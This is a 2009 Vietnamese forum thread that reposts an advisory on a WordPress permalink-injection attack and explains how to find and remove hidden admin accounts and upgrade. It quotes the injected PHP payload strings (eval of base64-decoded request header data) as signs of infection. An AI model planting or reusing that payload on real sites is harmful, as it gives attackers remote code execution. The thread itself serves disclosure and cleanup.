WordPress SQL Injection – Latest Attack

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

WordPress SQL Injection – Latest Attack

[Announcement] WordPress SQL Injection – Latest Attack	07/09/2009 02:37:21 (+0700) \| #1 \| 191992

holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline

http://www.wpbeginner.com/news/wordpress-sql-injection-latest-attack/

A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts urls will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention.

There was one of the following codes that were added to your permalink structure due to this attack:
Code:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

    “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%

These quotes appended all permalinks on your site and it can only be changed if removed manually.

To fix this go to:

Settings > Permalinks and remove the above code and replace your default code.

Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.

This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there.

We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon.

Also if you haven’t implement some of these measures to secure your http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/

HaCk t0 LeArN,N0t LeArN t0 HaCk

[Announcement] WordPress SQL Injection – Latest Attack	09/09/2009 06:14:48 (+0700) \| #2 \| 192152

holiganvn
Member

Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline

Tất cả những ai sử dụng WordPress phiên bản trước 2.8.4 đều gặp lỗi bảo mật này. Hãy nâng cấp phiên bản của bạn ngay bây giờ

Nếu đường dẫn cố định của bạn có một trong các chuỗi dưới đây, nhiều khả năng bạn đã bị tấn công:

Code:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Code:

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%

Một cách khác để nhận biết là có một số thành viên lạ trong blog của bạn. Thí dụ, bạn là quản trị duy nhất, nhưng bảng điều khiển hiển thị Administrator (2).

Để khắc phục, bạn cần phải tìm và xóa các thành viên khả nghi, tìm các bài viết có chứa chuỗi “eval” và tìm sửa thủ công các url bị virus sửa đổi.

Lỗ hổng bảo mật này đã được sớm phát hiện và khắc phục trong bản 2.8.4 (ra mắt ngày 12/8).

HaCk t0 LeArN,N0t LeArN t0 HaCk

[Announcement] WordPress SQL Injection – Latest Attack	10/09/2009 15:21:11 (+0700) \| #3 \| 192268

kimprinceat
Member

Joined: 12/04/2003 07:47:56
Messages: 3
Offline

Không bít còn cái nào bị ko ta. Search test thử đây. Thanks

Go to:

Users currently in here
1 Anonymous